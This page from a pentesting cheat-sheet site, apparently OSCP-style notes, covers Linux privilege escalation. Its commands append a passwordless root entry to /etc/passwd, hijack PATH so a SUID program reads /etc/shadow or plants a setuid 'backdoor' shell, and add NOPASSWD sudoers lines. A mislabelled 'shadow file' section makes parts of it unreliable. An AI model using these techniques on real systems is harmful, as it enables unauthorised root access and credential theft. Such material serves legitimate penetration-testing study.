šŸ©
HackBook.io
  • Pentesting Pocket Book for hackers and developers.
  • Reconnaissance
    • Internal Recon Basics
    • OSINT
      • Infrastructure
      • Recon-ng
      • Users
      • Google Dorks
    • Active Scanning
      • NMAP
        • NSE
          • reconnoitre
        • NMap Evasion
      • NC Scan
      • Finger Printing
    • Web Server OSINT
      • WhatWeb
      • Subdomains
      • Directory & File Enumeration
        • Enumeration
          • GoCutty
          • gobuster
          • Dirb
          • nikto
        • Fuzzing
        • Crawling
  • Web Application Hacking
    • Web 101
      • Clients
      • Servers
      • Encodings
    • Web Hacking Techniques
      • SOP
      • Open Redirect
      • File & Resource Attacks
        • Directory Traversal
          • Dir Traversal Fuzzer
        • LFI
        • RFI
        • Unrestricted File Uploads
      • XSS
        • DOM
        • Stored
        • Reflected
        • Blind
        • Self XSS
      • XXE
        • XXE Payloads
      • XPath
      • SSRF
      • CSRF
      • SQLi
        • SQL Basics
        • Securing SQL
        • Hacking SQL
          • sqlmap
          • In-Band
          • Error Based
          • Blind
      • Authorization
      • Session Hijacking
      • Command Injection
      • Insecure Deserialization
      • File Uploads
        • File Upload Mitigations
      • HPP
      • Click Jacking
        • Adobe SWF Investigator
      • HTTP Response Splitting
      • Flash 101
        • Flash Hacking
      • HTML5
        • WebSockets
        • CORS
          • iframe
          • Headers
    • Web Hacking Procedures
      • Captcha
      • Username Generation
      • Username Enumeration
      • Inhouse WebApps
      • SSL Cert Generation
      • CMS
        • WordPress
        • Joomla
      • Popular Exploits
        • Bludit CMS
        • ShellShock
        • WebDav
  • Weaponization
    • Buffer Overflows (BOF)
      • DSBOFG
        • Scripts
  • Initial Access
    • 😈Services
      • Finger
      • SNMP
      • LDAP
      • SMTP
      • NFS
      • RPC
        • RPCBind
      • RDP
      • SQL
        • NoSQL
      • POP3
      • Samba
      • SMB
      • SSH
      • Telnet
      • NetBios
      • VOIP/SIP
      • DNS
        • DNS Lookups
        • Zone Transfer
        • SubDomain Enums
        • dnsdumpster
    • 😈Shells
      • Powercat
      • Odd Shells
      • Troubleshoot
      • TTY/PTTY
  • Persistence
    • File Transfers
      • Py->Exe->Txt
      • Cross compile example
    • Backdoors
  • Privilege Escalation
    • Universal Escalation
    • Windows Escalation
      • Automated
      • Popular Exploits
        • ActiveXObject to Wscript RCE
        • Macros
        • Object Linking
    • Linux Escalation
      • Automated
    • Passwords
      • John
      • Medusa
      • Cewl
      • ncrack
      • Crunch
      • Hydra
      • MITM
      • Responder
        • SAM
          • pwdump and fgdump
          • Pass-the-hash
      • Crack the hash
      • NTLM
  • Network Discovery
    • Network Traffic
      • tcpdump
    • Internal Discovery
  • Collection and Staging
    • Collection
      • File types
  • Hacking Objectives
    • Non Kinetic War (Quick Guide)
  • Procedures
    • Bash Guide
    • Active Directory
    • Crypto 101
    • Forensics
  • Glossary
  • Hacking Frameworks
    • Metasploit
      • msfvenom
    • Dsnif
  • ThreatModeling
    • Threat Modeling Overview
  • Certifications
    • VMDR
      • Qualys Asset Management
      • Qualys Vulnerability Management
      • Qualys Threat Prioritization
      • Qualys Response (Patch Deployment)
    • OSCP Cheat Sheet
  • RF - Radio Frequency
    • Ham Technician
Powered by GitBook
On this page
  • The Single Best Resource:
  • Shell Change:
  • SUDO as another User
  • Write to PASSWD:
  • Add user and mod group:
  • OS info:
  • List processes:
  • Network info:
  • Firewall:
  • Scheduled tasks:
  • Installed apps and patch levels:
  • Read/Write files:
  • mounted disk:
  • Kernel modules (drivers):
  • Looking for SUID files:
  • history
  • Cron Job check
  • Add shadow file
  • Processes

Was this helpful?

  1. Privilege Escalation

Linux Escalation

PreviousObject LinkingNextAutomated

Last updated 2 years ago

Was this helpful?

The Single Best Resource:

Shell Change:

Some shells have vulnerabilities that others do not. The default bash program has far less vulns than shells like zsh. We can copy shells to directories that we have root privs on and then chmod 4755 on the new program. When we launch this local program we will then have root privs. We can also change the symbolic links for shells to point at a shell program that we want to run. //changing symbolic link //this one has us doing it as root though and is from my sec class //might be unreliable since we don't have root $ su Password: (enter root password) # cd /bin # rm sh # ln -s zsh sh

SUDO as another User

(we had sudo rights for a file owned by user 1000): $sudo -u#1000 ./file.sh

Write to PASSWD:

#echo root::0:0:root:/root:/bin/bash >> /etc/passwd #su #openssl passwd mypassword //will output a hashed password like ASWsdfhjL56. then we add that between the colons and save then we can either su to root or can ssh to root.

Add user and mod group:

#cd home/ && ls

We got denied the file read so we decide to try and add a user with the same UUID of 1014. #sudo adduser pwn //we automatically got assigned the 1001 user so we will need to change it to 1014 to read the file. #sudo sed -i -e 's/1001/1014/g' /etc/passwd //-i inline replace, -e execute script check with: #cat /etc/passwd | grep pwn #su pwn #id

OS info:

#cat /etc/issue #cat /etc/*-release

List processes:

#ps axu

Network info:

#ip a #/sbin/route #ss -anp

Firewall:

-Check /etc/iptables -We can also search for files created by the iptables-save command, which is used to dump thefirewall configuration to a file specified by the user. This file is then usually used as input for theiptables-restore command and used to restore the firewall rules at boot time. If a systemadministrator had ever run this command, we could search the configuration directory (/etc) orgrep the file system for iptables commands to locate the file.

Scheduled tasks:

#ls -lah /etc/cron* #cat /etc/crontab //search for cron jobs writable by all users find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

Installed apps and patch levels:

#dpkg -l or #rpm

Read/Write files:

# find / -writable -type d 2>/dev/null

mounted disk:

#cat /etc/fstab and #mount all avail disks: #/bin/lsblk

Kernel modules (drivers):

#lsmod #/sbin/modinfo <module to look at>

Looking for SUID files:

#find / -perm -u=s -type f 2>/dev/null or #find / -perm /4000 2>/dev/null //Now get a list of all the default suid files for that operating system and compare to see which are not default installations and what is likely user added. Run the suid binary (this case bash) with the suid bit: #./bash -p //if you ever need to launch a shell file with suid make sure to try using /bin/dash since dash wont drop suid bits the way bash will. Show library calls of SUID files: //that are being called by a program. This is good to see how program command arguments are being used to abuse them. #ltrace /usr/bin/checkHost 8.8.8.8 //there is also #strace that will show system calls but this will dos you with to much information. In this example we saw it was running the command "ping 8.8.8.8 |grep tra" //since grep is not path specified "/bin/grep" we can make our own grep command and force its use with the suid bit. This first file method is best because it will give you passwords and not just root. ----file---named-->grep #!/bin/dash cat /etc/shadow --------------------- --or--auto-root--- #!/bin/dash cp /bin/dash backdoor chown root:root backdoor chmod u+s backdoor -------------------- --or-r-shell-------- #!/bin/dash nc shell here --------------------- #chmod 755 grep #export PATH=.:$PATH //tells OS to check our current directory for binary programs before looking at /bin //so now if we run the program it will give us a root shell #checkHost 8.8.8.8 //returns shadow file to then use JTR on

history

Env variables for history: $HISTSIZE //number of command stored in history for the current user and session $HISTFILESIZE //how many commands are stored in the history file config file where these setting are saved: .Bashrc Run a command from history:

#history pick the number then: #!3 can rerun last command with: #!! Search cmd history: ctrl-r then start typing command name

fc: With ā€˜fc’ we can list command line history and also edit previous commands in a vi like experience to then re-execute them. This is shell local and not built into the OS List commands: #fc -l // we can append numbers to the end to select ranges or specific commands

Cron Job check

Monitor processes to check for running cron jobs.

#!/bin/bash
#Loop by line
IFS=$'\n'
old_process=$(ps -eo command)
while true; do new_process=$(ps -eo command) diff <(echo "$old_process") <(echo "$new_process") | grep [<>] sleep 1 old_process=$new_process 
done

Add shadow file

add yourself to shadow file:

#echo -e "/r/nwww-data ALL=(ALL)NOPASSWD: ALL"

echo -e "/r/njeremy ALL=(ALL)NOPASSWD: ALL"

Processes

Process Spying:

located in /opt/pspy/

check vuln box attributes

#uname -a

on attacker build the tool (in pspy dir):

#GOOS=linux GOARCH=amd64 go build

Page cover image
Basic Linux Privilege Escalation - g0tmi1k
Logo